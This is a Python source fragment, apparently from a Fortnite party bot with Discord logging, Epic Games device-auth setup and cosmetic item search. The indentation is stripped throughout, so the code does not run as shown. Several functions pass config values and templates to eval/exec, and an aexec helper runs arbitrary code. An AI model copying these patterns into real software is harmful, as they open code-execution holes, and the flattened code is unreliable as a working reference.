for webhook in data['webhook'].split(','):
content = content.replace(webhook,len(webhook)*"X")
if storedlogs and list(storedlogs[-1].keys())[0] == username:
storedlogs[-1][username] += f'\n{content}'
else:
storedlogs.append({username: content})
def send(user_name: str, content: Any, color: Optional[Callable] = None, add_p: Optional[Callable] = None, add_d: Optional[Callable] = None) -> None:
content = str(content)
if not data['no-logs'] or color is red:
if not color:
if not add_p:
print(content)
else:
print(add_p(content))
else:
if not add_p:
print(color(content))
else:
print(color(add_p(content)))
content = discord.utils.escape_markdown(content)
if not add_d:
dstore(user_name,content)
else:
dstore(user_name,add_d(content))
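# Usage sketch (all arguments illustrative): `color` wraps the console line,
# `add_p` decorates the printed form only, and `add_d` decorates the copy
# queued for the Discord webhook via dstore().
#
#   send("Bot", "hello", green,
#        add_p=lambda x: f"[{now()}] {x}",
#        add_d=lambda x: f">>> {x}")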
def split_ignore(text: str, ignore: Optional[str] = None) -> list:
# Tokenize on whitespace: runs of non-whitespace characters become tokens,
# each non-ignored whitespace character also emits an empty-string marker,
# and the ignored character joins adjacent tokens together.
temp = ""
text_list = []
for char in text:
if char.split() != []:
temp += char
elif char != ignore:
if temp != "":
text_list.append(temp)
temp = ""
text_list.append("")
if temp != "":
text_list.append(temp)
return text_list
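# A behaviour sketch (values derived by tracing the loop above, not taken
# from any upstream docs):
#
#   split_ignore("a b")                 # -> ['a', '', 'b']
#   split_ignore("a b", ignore=" ")     # -> ['ab']
#   split_ignore("a\tb c", ignore=" ")  # -> ['a', '', 'bc']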
def eval_format(text: str, variables: Optional[dict] = None) -> str:
variables = variables or {}  # avoid a shared mutable default
for match in format_pattern.finditer(text):
match_text = match.group()
eval_text = match_text.replace("{","",1)[::-1].replace("}","",1)[::-1]
result = eval(eval_text,globals(),variables)
text = text.replace(match_text,str(result),1)
return text
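# A small usage sketch (hypothetical variables, assuming format_pattern
# matches {...} spans): each {expression} is evaluated with eval() against
# globals plus the supplied mapping and substituted back into the text.
#
#   eval_format("Hello {member_display_name}!", {"member_display_name": "Ninja"})
#   # -> "Hello Ninja!"
#
# Note: this calls eval() on the template, so only trusted config values
# (joinmessage/randommessage) should ever reach it.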
def get_client_data(id_: str) -> defaultdict:
var = defaultdict(lambda: None)
for client in clients:
if not client.isready:
continue
if client.user.id == id_:
break
else:
return var
party = getattr(client,"party",None)
if party:
config = party.config
var.update(
{
"party_id": party.id,
"party_size": party.member_count,
"party_max_size": config["max_size"]
}
)
var.update(
{
"friend_count": len(client.friends),
"pending_count": len(client.pending_friends),
"incoming_pending_count": len(client.incoming_pending_friends),
"outgoing_pending_count": len(client.outgoing_pending_friends),
"block_count": len(client.blocked_users),
"display_name": client.user.display_name,
"id": client.user.id,
"boot_time": int(time.time() - dclient.boot_time)
}
)
return var
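# Sketch of the returned mapping (the id below is a placeholder): because the
# result is a defaultdict, templates can reference any key without raising
# KeyError -- unknown keys simply evaluate to None.
#
#   var = get_client_data("<account-id>")
#   var["display_name"]  # the bot's display name
#   var["party_size"]    # current member count, present only when in a party
#   var["no_such_key"]   # None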
def get_guild_member_count(id_: Union[str, int]) -> Optional[int]:
if isinstance(id_,str):
id_ = int(id_)
guild = dclient.get_guild(id_)
if guild is None:
return None
return guild.member_count
def platform_to_str(platform: fortnitepy.Platform) -> Optional[str]:
converter = {
fortnitepy.Platform.WINDOWS: "Windows",
fortnitepy.Platform.MAC: "Mac",
fortnitepy.Platform.PLAYSTATION: "PlayStation",
fortnitepy.Platform.XBOX: "Xbox",
fortnitepy.Platform.SWITCH: "Switch",
fortnitepy.Platform.IOS: "IOS",
fortnitepy.Platform.ANDROID: "Android"
}
return converter.get(platform)
def convert_to_type(text: str) -> Optional[str]:
if any(text.lower() in commands[key] for key in outfit_keys) or text.lower().startswith("cid_"):
return "Outfit"
elif any(text.lower() in commands[key] for key in backpack_keys) or text.lower().startswith("bid_"):
return "Back Bling"
elif any(text.lower() in commands[key] for key in pet_keys) or text.lower().startswith("petcarrier_"):
return "Pet"
elif any(text.lower() in commands[key] for key in pickaxe_keys) or text.lower().startswith("pickaxe_id"):
return "Harvesting Tool"
elif any(text.lower() in commands[key] for key in emote_keys) or text.lower().startswith("eid_"):
return "Emote"
elif any(text.lower() in commands[key] for key in emoji_keys) or text.lower().startswith("emoji_"):
return "Emoticon"
elif any(text.lower() in commands[key] for key in toy_keys) or text.lower().startswith("toy_"):
return "Toy"
elif any(text.lower() in commands[key] for key in item_keys):
return "Item"
def convert_to_asset(text: str) -> Optional[str]:
if any(text.lower() in commands[key] for key in outfit_keys) or text.lower().startswith("cid_"):
return "outfit"
elif any(text.lower() in commands[key] for key in backpack_keys) or text.lower().startswith("bid_"):
return "backpack"
elif any(text.lower() in commands[key] for key in pet_keys) or text.lower().startswith("petcarrier_"):
return "backpack"
elif any(text.lower() in commands[key] for key in pickaxe_keys) or text.lower().startswith("pickaxe_id"):
return "pickaxe"
elif any(text.lower() in commands[key] for key in emote_keys) or text.lower().startswith("eid_"):
return "emote"
elif any(text.lower() in commands[key] for key in emoji_keys) or text.lower().startswith("emoji_"):
return "emote"
elif any(text.lower() in commands[key] for key in toy_keys) or text.lower().startswith("toy_"):
return "emote"
def convert_to_id(text: str) -> Optional[str]:
if any(text.lower() in commands[key] for key in outfit_keys) or text.lower().startswith("cid_"):
return "cid"
elif any(text.lower() in commands[key] for key in backpack_keys) or text.lower().startswith("bid_"):
return "bid"
elif any(text.lower() in commands[key] for key in pet_keys) or text.lower().startswith("petcarrier_"):
return "petcarrier"
elif any(text.lower() in commands[key] for key in pickaxe_keys) or text.lower().startswith("pickaxe_id"):
return "pickaxe_id"
elif any(text.lower() in commands[key] for key in emote_keys) or text.lower().startswith("eid_"):
return "eid"
elif any(text.lower() in commands[key] for key in emoji_keys) or text.lower().startswith("emoji_"):
return "emoji_id"
elif any(text.lower() in commands[key] for key in toy_keys) or text.lower().startswith("toy_"):
return "toy_id"
elif any(text.lower() in commands[key] for key in item_keys):
return "id"
def convert_to_old_type(text: str) -> Optional[str]:
converter = {
"outfit": "outfit",
"back bling": "backpack",
"pet": "pet",
"harvesting tool": "pickaxe",
"emote": "emote",
"emoticon":" emoji",
"toy": "toy",
"item": "item"
}
return converter.get(text.lower())
def convert_to_new_type(text: str) -> Optional[str]:
converter = {
"outfit": "Outfit",
"backpack": "Back Bling",
"pet": "Pet",
"pickaxe": "Harvesting Tool",
"emote": "Emote",
"emoji": "Emoticon",
"toy": "Toy",
"item": "Item"
}
return converter.get(text.lower())
def convert_backend_type(backendType: str) -> str:
converter = {
"AthenaBackpack": "Back Bling",
"AthenaPickaxe": "Harvesting Tool",
"AthenaItemWrap": "Wrap",
"AthenaGlider": "Glider",
"AthenaCharacter": "Outfit",
"AthenaPet": "Pet",
"AthenaMusicPack": "Music",
"AthenaLoadingScreen": "Loading Screen",
"AthenaDance": "Emote",
"AthenaSpray": "Spray",
"AthenaEmoji": "Emoticon",
"AthenaSkyDiveContrail": "Contrail",
"AthenaPetCarrier": "Pet",
"AthenaToy": "Toy",
"AthenaConsumableEmote": "Emote",
"AthenaBattleBus": "Battle Bus",
"AthenaRewardEventGraphCosmetic": "Outfit",
"AthenaVictoryPose": "Emote"
}
return converter.get(backendType)
def convert_variant(type_: str, variants: List[dict]) -> List[dict]:
result = []
for variant in variants:
for option in variant['options']:
result.append(
{
"name": option['name'],
'variants': [
{
'c': variant['channel'],
'v': option['tag'],
'dE': 0
}
]
}
)
return result
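# A minimal conversion sketch using a made-up variant payload (channel and
# tag names are illustrative, not real cosmetic data):
#
#   raw = [{"channel": "Material", "options": [{"name": "Gold", "tag": "Mat2"}]}]
#   convert_variant("Outfit", raw)
#   # -> [{"name": "Gold", "variants": [{"c": "Material", "v": "Mat2", "dE": 0}]}]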
def get_device_auth_details() -> dict:
if os.path.isfile(filename):
with open(filename, 'r') as f:
return json.load(f)
return {}
def store_device_auth_details(email: str, details: dict) -> None:
existing = get_device_auth_details()
existing[email.lower()] = details
with open(filename, 'w') as f:
json.dump(existing, f)
def load_json(filename: str) -> Union[list,dict]:
try:
with open(filename,encoding='utf-8') as f:
data = json.load(f)
except (json.decoder.JSONDecodeError, UnicodeDecodeError):
try:
with open(filename,encoding='utf-8-sig') as f:
data = json.load(f)
except (json.decoder.JSONDecodeError, UnicodeDecodeError):
with open(filename,encoding='shift_jis') as f:
data = json.load(f)
return data
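# Encoding-fallback sketch: the file is tried as UTF-8 first, then UTF-8 with
# a BOM, then Shift_JIS (common for Japanese editors), so configs saved from
# Windows Notepad still load:
#
#   config = load_json("config.json")    # dict
#   replies = load_json("replies.json")  # list or dict, depending on the file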
def load_config(client: Optional[fortnitepy.Client] = None) -> bool:
global data
global commands
global replies
try:
data = load_json("config.json")
except json.decoder.JSONDecodeError as e:
send('ボット',f'{traceback.format_exc()}\n{e}',red,add_d=lambda x:f'>>> {x}')
send('ボット','config.json ファイルの読み込みに失敗しました。正しく書き込めているか確認してください',red,add_d=lambda x:f'>>> {x}')
send('Bot','Failed to load config.json file. Make sure it is written correctly',red,add_d=lambda x:f'>>> {x}')
return False
except FileNotFoundError:
send('ボット',traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send('ボット','config.json ファイルが存在しません',red,add_d=lambda x:f'>>> {x}')
send('Bot','config.json file does not exist',red,add_d=lambda x:f'>>> {x}')
return False
if data.get('loglevel','normal') == 'debug':
send('ボット',f'\n{json.dumps(data,ensure_ascii=False,indent=4)}\n',yellow,add_d=lambda x:f'\n```{x}```\n')
for key,tags in config_tags_raw.items():
try:
value = eval(f"data{key}")
except KeyError:
error_config.append(key)
else:
if isinstance(value,dict):
continue
if bool_ in tags:
if not isinstance(value,bool):
error_config.append(key)
elif bool_none in tags:
if not isinstance(value,(bool,None.__class__)):
error_config.append(key)
elif "can_be_multiple" in tags:
if not isinstance(value,list):
if str in tags:
error_config.append(key)
try:
exec(f"data{key} = value.split(',')")
except Exception:
if data.get('loglevel','normal') == 'debug':
send('ボット',traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
elif int in tags:
error_config.append(key)
try:
exec(f"data{key} = [value]")
except Exception:
if data.get('loglevel','normal') == 'debug':
send('ボット',traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
else:
if not isinstance(value,tags[0]):
error_config.append(key)
try:
exec(f"data{key} = tags[0](value)")
except Exception:
if data.get('loglevel','normal') == 'debug':
send('ボット',traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
checks = [
['fortnite','owner'],
['fortnite','blacklist'],
['fortnite','whitelist'],
['fortnite','invitelist'],
['fortnite','otherbotlist'],
['discord','owner'],
['discord','blacklist'],
['discord','whitelist']
]
for check in checks:
k,k2 = check
try:
for value in data.get(k,{}).get(k2,[]).copy():
if len(str(value)) == 0:
data.get(k,{}).get(k2,[]).remove(value)
except Exception:
if data.get('loglevel','normal') == 'debug':
send('ボット',traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
with open("config.json", 'w', encoding='utf-8') as f:
json.dump(data, f, ensure_ascii=False, indent=4)
def set_default(keys: list, default: Any, func: Optional[Callable] = None) -> None:
text = ""
text2 = ""
for nest,key in enumerate(keys,1):
text += f"['{key}']"
if nest == len(keys):
if isinstance(default,str):
text2 += f".get('''{key}''','''{default}''')"
else:
text2 += f".get('''{key}''',{default})"
else:
text2 += f"['''{key}''']"
if func:
var = func(eval(f"data{text2}"))
exec(f"data{text} = var")
else:
exec(f"data{text} = data{text2}")
set_default(['fortnite'],{})
set_default(['fortnite','outfit'],"")
set_default(['fortnite','outfit_style'],"")
set_default(['fortnite','backpack'],"")
set_default(['fortnite','backpack_style'],"")
set_default(['fortnite','pickaxe'],"")
set_default(['fortnite','pickaxe_style'],"")
set_default(['fortnite','emote'],"")
try:
set_default(['fortnite','privacy'],'public',lambda x: getattr(PartyPrivacy,x.upper()))
except AttributeError:
send('ボット',traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
error_config.append("['fortnite']['privacy']")
set_default(['fortnite','avatar_color'],'#ffffff,#ffffff,#ffffff')
set_default(['discord','channels'],['{name}-command-channel'],lambda x: [i.replace(" ","-").replace(".","-").replace(",","-").replace("--","-").lower() for i in x])
try:
set_default(['discord','status_type'],'playing',lambda x: getattr(discord.ActivityType,x.lower()))
except AttributeError:
send('ボット',traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
error_config.append("['discord']['status_type']")
set_default(['web'],{})
set_default(['web','ip'],'{ip}')
set_default(['web','port'],8080)
set_default(['web','login_required'],False)
set_default(['lang'],'en')
set_default(['caseinsensitive'],False)
set_default(['no-logs'],False)
set_default(['discord-log'],False)
set_default(['search_max'],60)
set_default(['omit-over2000'],False)
set_default(['skip-if-overflow'],False)
set_default(['hide-email'],False)
set_default(['hide-token'],False)
set_default(['hide-webhook'],False)
set_default(['loglevel'],'normal')
if data.get("status",1) == 0:
config_tags["['fortnite']['email']"].append("red")
config_tags["['lang']"].append("red")
if os.getcwd().startswith('/app') or os.getcwd().startswith('/home/runner'):
data['web']['ip']="0.0.0.0"
else:
data['web']['ip'] = data['web']['ip'].format(ip=socket.gethostbyname(socket.gethostname()))
if client:
client.status_ = data['fortnite']['status']
client.whisper = data['fortnite']['whisper']
client.partychat = data['fortnite']['partychat']
client.discord = data['discord']['discord']
client.web = data['web']['web']
client.whisperperfect = data['fortnite']['disablewhisperperfectly']
client.partychatperfect = data['fortnite']['disablepartychatperfectly']
client.discordperfect = data['discord']['disablediscordperfectly']
client.joinmessageenable = data['fortnite']['joinmessageenable']
client.randommessageenable = data['fortnite']['randommessageenable']
client.outfitmimic = data['fortnite']['outfitmimic']
client.backpackmimic = data['fortnite']['backpackmimic']
client.pickaxemimic = data['fortnite']['pickaxemimic']
client.emotemimic = data['fortnite']['emotemimic']
client.outfitlock = data['fortnite']['outfitlock']
client.backpacklock = data['fortnite']['backpacklock']
client.pickaxelock = data['fortnite']['pickaxelock']
client.emotelock = data['fortnite']['emotelock']
client.acceptinvite = data['fortnite']['acceptinvite']
client.acceptfriend = data['fortnite']['acceptfriend']
if error_config:
send('ボット',f'config.json ファイルの読み込みに失敗しました。キーの名前が間違っていないか確認してください。アップデート後の場合は、最新のconfig.jsonファイルを確認してください\n{", ".join(error_config)} がありません',red,add_d=lambda x:f'>>> {x}')
send('Bot',f'Failed to load config.json file. Make sure the key names are correct. If this happened after an update, please check the latest config.json file\n{", ".join(error_config)} is missing',red,add_d=lambda x:f'>>> {x}')
os.makedirs("items/", exist_ok=True)
def load_lang(lang: str) -> bool:
global localize
try:
localize = load_json(f"lang/{lang}.json")
except json.decoder.JSONDecodeError as e:
send('ボット',f'{traceback.format_exc()}\n{e}',red,add_d=lambda x:f'>>> {x}')
send('ボット',f'{data["lang"]}.json ファイルの読み込みに失敗しました。正しく書き込めているか確認してください\n',red,add_d=lambda x:f'>>> {x}')
send('Bot',f'Failed to load {data["lang"]}.json file. Make sure you wrote correctly',red,add_d=lambda x:f'>>> {x}')
return False
except FileNotFoundError:
send('ボット',traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send('ボット',f'{data["lang"]}.json ファイルが存在しません',red,add_d=lambda x:f'>>> {x}')
send('Bot',f'{data["lang"]}.json file does not exist',red,add_d=lambda x:f'>>> {x}')
return False
return True
if os.path.isfile(f"lang/{data['lang']}.json"):
if not load_lang(data['lang']):
return False
else:
if not load_lang("en"):
return False
color = data['fortnite']['avatar_color'].split(',') if data['fortnite']['avatar_color'] else ""
if len(color) > 2:
background_colors = [color[0], color[1], color[2]]
elif len(color) == 1:
try:
background_colors = eval(f"fortnitepy.KairosBackgroundColorPreset.{color[0]}")
except (AttributeError, SyntaxError):
send(l('bot'),l('color_must_be'))
error_config.append("['fortnite']['avatar_color']")
background_colors = ["#ffffff","#ffffff","#ffffff"]
else:
background_colors = None
data['fortnite']['avatar_color'] = background_colors
try:
commands = load_json("commands.json")
except json.decoder.JSONDecodeError as e:
send(l('bot'),f'{traceback.format_exc()}\n{e}',red,add_d=lambda x:f'>>> {x}')
send(l('bot'),l("load_failed_json", "commands.json"),red,add_d=lambda x:f'>>> {x}')
return False
except FileNotFoundError:
send(l('bot'),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(l('bot'),l("load_failed_notfound", "commands.json"),red,add_d=lambda x:f'>>> {x}')
return False
if data['loglevel'] == 'debug':
send(l('bot'),f'\n{json.dumps(commands,ensure_ascii=False,indent=4)}\n',yellow,add_d=lambda x:f'\n```{x}```\n')
for key,tags in commands_tags.items():
try:
value = eval(f"commands{key}")
except KeyError:
error_commands.append(key)
else:
if not isinstance(value,list):
try:
exec(f"commands{key} = value.split(',')")
except Exception:
if data["loglevel"] == 'debug':
send(l('bot'),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
error_commands.append(key)
with open("commands.json", 'w', encoding='utf-8') as f:
json.dump(commands, f, ensure_ascii=False, indent=4)
def set_default_(key: str, default: Any, func: Optional[Callable] = None) -> None:
text = f"['{key}']"
text2 = f".get('{key}','{default}')"
if func:
exec(f"commands{text} = {func}(commands{text2})")
else:
exec(f"commands{text} = commands{text2}")
set_default_("usercommands","")
if error_commands:
send(l('bot'),f'{l("load_failed_keyerror", "commands.json")}\n{l("is_missing", ", ".join(error_commands))}',red,add_d=lambda x:f'>>> {x}')
if data['caseinsensitive']:
commands = {k.lower(): [jaconv.kata2hira(c.lower()) for c in v] for k,v in commands.items()}
flag = True
commands['ownercommands'] = []
if "{all}" in commands['usercommands']:
for command in (list(commands_tags.keys()) + ["cid_","bid_","petcarrier_","pickaxe_id_","eid_","emoji_","toy_","item-search"]):
command = command.replace("['","",1).replace("']","",1)
if command in ["usercommands","true","false","me","privacy_public","privacy_friends_allow_friends_of_friends","privacy_friends","privacy_private_allow_friends_of_friends","privacy_private","info_party"]:
continue
if command in [i.lower() for i in commands['usercommands']]:
commands['ownercommands'].append(command)
else:
for command in (list(commands_tags.keys()) + ["cid_","bid_","petcarrier_","pickaxe_id_","eid_","emoji_","toy_","item-search"]):
command = command.replace("['","",1).replace("']","",1)
if command in ["usercommands","true","false","me","privacy_public","privacy_friends_allow_friends_of_friends","privacy_friends","privacy_private_allow_friends_of_friends","privacy_private","info_party"]:
continue
if command not in [i.lower() for i in commands['usercommands']]:
commands['ownercommands'].append(command)
try:
replies = load_json("replies.json")
except json.decoder.JSONDecodeError as e:
send(l('bot'),f'{traceback.format_exc()}\n{e}',red,add_d=lambda x:f'>>> {x}')
send(l('bot'),l("load_failed_json", "replies.json"),red,add_d=lambda x:f'>>> {x}')
return False
except FileNotFoundError:
send(l('bot'),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(l('bot'),l("load_failed_notfound", "replies.json"),red,add_d=lambda x:f'>>> {x}')
return False
return True
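# --- Cosmetic item data ---
# get_item_data fetches the full BR cosmetics list from the BenBot API for one
# language; store_item_data fans those requests out over a thread pool and
# writes one items/<type>_<lang>.json file per cosmetic type, keyed by
# convert_backend_type. Hypothetical usage:
#   store_item_data(["en", "ja"])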
def get_item_data(lang: str) -> Optional[list]:
res = requests.get("https://benbotfn.tk/api/v1/cosmetics/br", params={"lang": lang})
if res.status_code == 200:
return res.json()
return None
def store_item_data(langs: list) -> None:
with ThreadPoolExecutor() as executor:
futures = {executor.submit(get_item_data,lang): lang for lang in langs}
for future in as_completed(futures):
lang = futures[future]
result = future.result()
if result is None:
    send(l("bot"),f"Failed to fetch {lang} items",red)
    continue
data_ = {}
if data["loglevel"] == "debug":
send(l("bot"),f"Saving {lang} items",yellow)
for item in result:
type_ = convert_backend_type(item["backendType"])
if type_ in ignoretype:
continue
if not data_.get(type_):
data_[type_] = []
data_[type_].append(item)
for type_,items in data_.items():
with open(f"items/{type_}_{lang}.json","w",encoding="utf-8") as f:
json.dump(items,f,ensure_ascii=False,indent=4)
if data["loglevel"] == "debug":
send(l("bot"),f"Saved {lang} items",yellow)
def partymember_backpack(member: fortnitepy.party.PartyMemberBase) -> Optional[str]:
asset = member.meta.backpack
result = re.search(r".*\.([^\'\"]*)", asset.strip("'"))
if result and result.group(1) != 'None':
return result.group(1)
def partymember_emote(member: fortnitepy.party.PartyMemberBase) -> Optional[str]:
asset = member.meta.emote
result = re.search(r".*\.([^\'\"]*)", asset.strip("'"))
if result and result.group(1) != 'None':
return result.group(1)
def member_asset(member: fortnitepy.party.PartyMemberBase, asset: str) -> Optional[str]:
if asset in ("backpack", "pet"):
return partymember_backpack(member)
elif asset in ("emote", "emoji", "toy"):
return partymember_emote(member)
else:
return getattr(member, asset, None)
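# search_item looks in the per-language in-memory cache first and only re-reads
# the items/*.json files when nothing matched (the cache=False retry); fresh
# hits are written back into cache_items. mode is one of "name", "id" or "set".
# Hypothetical example (the type_ value is an assumption):
#   search_item("en", "name", "Renegade", type_="outfit")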
def search_item(lang: str, mode: str, text: str, type_: Optional[str] = None, cache: bool = True) -> Optional[List[dict]]:
itemlist = []
if not cache_items.get(lang):
cache_items[lang] = []
if cache:
if mode == 'set':
data_ = cache_items[lang]
else:
data_ = [i for i in cache_items[lang] if convert_backend_type(i["backendType"]) in type_.split(',')]
else:
data_ = []
if type_ not in ["Item", None]:
with ThreadPoolExecutor() as executor:
def _open_file(filename: str) -> Union[list, dict]:
with open(filename, 'r', encoding='utf-8') as f:
d = json.load(f)
return d
futures = [executor.submit(_open_file,f'items/{i}_{lang}.json') for i in type_.split(',')]
for future in futures:
data_.extend(future.result())
else:
with ThreadPoolExecutor() as executor:
def _open_file(filename: str) -> Union[list, dict]:
with open(filename, 'r', encoding='utf-8') as f:
d = json.load(f)
return d
def _(text: str) -> str:
return re.sub(r"items(\\|/)","",text).replace(f"_{lang}.json","")
futures = [executor.submit(_open_file,f'items/{_(i)}_{lang}.json') for i in glob(f"items/*_{lang}.json") if _(i)[0].isupper()]
for future in futures:
data_.extend(future.result())
for item in data_:
try:
if convert_backend_type(item["backendType"]) in ignoretype or item in itemlist or item.get("name") is None:
continue
if mode == "name":
if data['caseinsensitive']:
text_ = jaconv.hira2kata(text.lower())
name = jaconv.hira2kata(item['name'].lower())
else:
text_ = text
name = item['name']
if text_ in name:
itemlist.append(item)
elif mode == "id":
text_ = text
if text_.lower() in item['id'].lower():
itemlist.append(item)
elif mode == "set":
if not item.get('set'):
continue
if data['caseinsensitive']:
text_ = jaconv.hira2kata(text.lower())
name = jaconv.hira2kata(item['set'].lower())
else:
text_ = text
name = item['set']
if text_ in name:
itemlist.append(item)
except Exception:
send(l("bot"),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(l("bot"),item,red,add_d=lambda x:f'>>> {x}')
if len(itemlist) == 0:
if cache:
return search_item(lang=lang, mode=mode, text=text, type_=type_, cache=False)
else:
return None
else:
if not cache:
for item in itemlist:
if item not in cache_items[lang]:
cache_items[lang].append(item)
return itemlist
def search_style(lang: str, id_: str, type_: str, cache: bool = True) -> Optional[List[dict]]:
if not cache_items.get(lang):
cache_items[lang] = []
if cache:
data_ = cache_items[lang]
else:
data_ = []
if type_ != "Item":
with ThreadPoolExecutor() as executor:
futures = [executor.submit(load_json,f'items/{i}_{lang}.json') for i in type_.split(',')]
for future in futures:
data_.extend(future.result())
else:
with ThreadPoolExecutor() as executor:
def _(text: str) -> str:
return re.sub(r"items(\\|/)","",text).replace(f"_{lang}.json","")
futures = [executor.submit(load_json,f'items/{_(i)}_{lang}.json') for i in glob(f"items/*_{lang}.json") if _(i)[0].isupper()]
for future in futures:
data_.extend(future.result())
variants = None
for item in data_:
if item['id'].lower() == id_.lower():
if item['variants']:
variants = convert_variant(item['backendType'], item['variants'])
break
if not variants:
if cache:
return search_style(lang=lang, id_=id_, type_=type_, cache=False)
else:
return None
else:
if not cache:
if item not in cache_items[lang]:
cache_items[lang].append(item)
return variants
def get_banner_data() -> Optional[dict]:
res = requests.get("https://benbotfn.tk/api/v1/exportAsset?path=FortniteGame/Content/Banners/BannerIcons")
if res.status_code == 200:
return res.json()
return None
def store_banner_data() -> None:
    banners = get_banner_data()  # local name avoids shadowing the global config `data`
    if banners is None:
        return
    with open("items/banners.json","w",encoding="utf-8") as f:
        json.dump(banners,f,indent=4,ensure_ascii=False)
def search_banner(id_: str) -> Optional[dict]:
data_ = load_json("items/banners.json")
data_ = {k.lower():v for k,v in data_.items()}
return data_.get(id_.lower())
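# restart re-executes the current interpreter in place via os.execv: the
# process keeps its PID but all module state is rebuilt from scratch.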
def restart(sleep_time: Union[int, float] = 0) -> None:
if sleep_time > 0:
time.sleep(sleep_time)
# re-exec the current interpreter with the same arguments (the PID is kept)
os.execv(sys.executable, [sys.executable, *sys.argv])
if True:  # Asynchronous functions, grouped under one indent level
async def reply(message: Union[fortnitepy.message.MessageBase, discord.Message, WebMessage], client: fortnitepy.Client, content: str) -> None:
if isinstance(message, fortnitepy.message.MessageBase):
await message.reply(content)
elif isinstance(message, discord.Message):
if len(content) > 1990:
    # Discord caps messages at 2000 characters: split on newlines,
    # then hard-wrap any single line that is still too long
    for txt in discord.utils.escape_markdown(content).split("\n"):
        if len(txt) > 1990:
            for i in range(0, len(txt), 1990):
                await message.channel.send(txt[i:i+1990])
        else:
            await message.channel.send(txt)
else:
    await message.channel.send(content)
elif isinstance(message, WebMessage):
message.reply(content)
elif isinstance(message, AllMessage):
message.reply(content, client)
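# aexec implements "async exec": the snippet is wrapped in a generated
# `async def __ex(var)` so it can be awaited, leading indentation (half- or
# full-width spaces) is measured on the first line and stripped from every
# line, and the wrapper's locals are copied back out so plain assignments in
# the snippet become globals afterwards.
# Hypothetical example: await aexec("return 40 + 2", {})  # -> 42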
async def aexec(code: str, variable: dict) -> Any:
def _(text) -> str:
return re.match(r"(\u0020|\u3000)*", text).end() * u"\u0020"
scode = code.split('\n')
delete = len(_(scode[0]))
lines = [i.replace(u"\u0020", "", delete) for i in scode]
exc = (
f'async def __ex(var):'
+ '\n for v in var:'
+ '\n v = var[v]'
+ ''.join(f'\n {l}' for l in lines)
+ '\n for v in locals():'
+ '\n var[v] = locals()[v]'
)
if data['loglevel'] == 'debug':
send(l('bot'),exc,yellow,add_d=lambda x:f'```\n{x}\n```')
exec(exc)
variable_before = variable.copy()
result = await locals()['__ex'](variable)
variable_after = variable.copy()
newvar = {k: v for k,v in variable_after.items() if (k not in variable_before.keys() or v != variable_before.get(k)) and "_" not in k and k not in ("k", "v") and isinstance(k, str)}
for k in newvar:
exc = (
f"global {k}"
+ f"\n{k} = newvar['{k}']"
)
exec(exc)
return result
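# Device-auth bootstrap: the user pastes the redirect payload from Epic's
# /fnauth page, the authorization code is exchanged for an access token, the
# account email is verified against the configured one, and an exchange code
# is then used to mint device auth details that are persisted via
# store_device_auth_details.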
async def generate_device_auth_and_store(email: str) -> str:
global web_text
while True:
send(l('bot'),l('get_code', email))
web_text = l('get_code2', email)
response = await ainput("Data: \n")
if "redirectUrl" in response:
response = json.loads(response)
if "?code" not in response["redirectUrl"]:
send(l('bot'),l('unauthorized'))
continue
code = response["redirectUrl"].split("?code=")[1]
else:
if "https://accounts.epicgames.com/fnauth" in response:
if "?code" not in response:
send(l('bot'),l('unauthorized'))
continue
code = response.split("?code=")[1]
else:
code = response
data = await authorization_code_auth(code)
try:
access_token = data["access_token"]
in_app_id = data["in_app_id"]
except KeyError:
send(l('bot'),l('authorization_expired'))
continue
fortnite_access_token, fortnite_expires_at = await get_fortnite_token(access_token)
user = await lookup_user(in_app_id, fortnite_access_token)
if user["email"].lower() == email.lower():
break
else:
send(l('bot'),l('account_incorrect', user["email"], email))
continue
exchange_code = await exchange(access_token)
launcher_access_token, client_id = await exchange_code_auth(exchange_code)
details = await generate_device_auth(client_id, launcher_access_token)
store_device_auth_details(email.lower(), details)
web_text = ""
return details
async def get_token() -> tuple:
async with aiohttp.ClientSession() as session:
data = await session.post(
oauth_url,
headers={
"Authorization": f"basic {launcher_token}"
},
data={
"grant_type": "client_credentials",
"token_type": "eg1"
}
)
data = await data.json()
return data["access_token"], datetime.datetime.fromisoformat(data["expires_at"].replace("Z",""))
async def get_fortnite_token(access_token: str) -> tuple:
exchange_code = await exchange(access_token)
async with aiohttp.ClientSession() as session:
data = await session.post(
fortnite_token_url,
headers={
"Authorization": f"basic {fortnite_token}"
},
data={
"grant_type": "exchange_code",
"token_type": "eg1",
"exchange_code": exchange_code
}
)
data = await data.json()
return data["access_token"], datetime.datetime.fromisoformat(data["expires_at"].replace("Z",""))
async def authorization_code_auth(authorization_code: str) -> dict:
async with aiohttp.ClientSession() as session:
data = await session.post(
oauth_url,
headers={
"Authorization": f"basic {launcher_token}"
},
data={
"grant_type": "authorization_code",
"code": authorization_code,
"token_type": "eg1"
}
)
return await data.json()
async def exchange_code_auth(exchange_code: str) -> tuple:
async with aiohttp.ClientSession() as session:
data = await session.post(
exchange_auth_url,
headers={
"Authorization": f"basic {launcher_token}"
},
data={
"grant_type": "exchange_code",
"exchange_code": exchange_code,
"token_type": "eg1"
}
)
data = await data.json()
return data["access_token"], data["account_id"]
async def exchange(access_token: str) -> str:
async with aiohttp.ClientSession() as session:
data = await session.get(
exchange_url,
headers={
"Authorization": f"bearer {access_token}"
}
)
data = await data.json()
return data["code"]
async def lookup_user(user_id: str, fortnite_access_token: str) -> dict:
async with aiohttp.ClientSession() as session:
data = await session.get(
user_lookup_url.format(user_id=user_id),
headers={
"Authorization": f"bearer {fortnite_access_token}"
}
)
data = await data.json()
return data
async def generate_device_auth(client_id: str, access_token: str) -> dict:
async with aiohttp.ClientSession() as session:
data = await session.post(
f"https://account-public-service-prod.ol.epicgames.com/account/api/public/account/{client_id}/deviceAuth",
headers={
"Authorization": f"Bearer {access_token}",
"Content-Type": "application/json"
}
)
data = await data.json()
return {"device_id": data["deviceId"], "account_id": data["accountId"], "secret": data["secret"]}
async def run_bot() -> None:
for client in clients:
client.booting = True
if data.get('restart_in') not in [None, 0]:
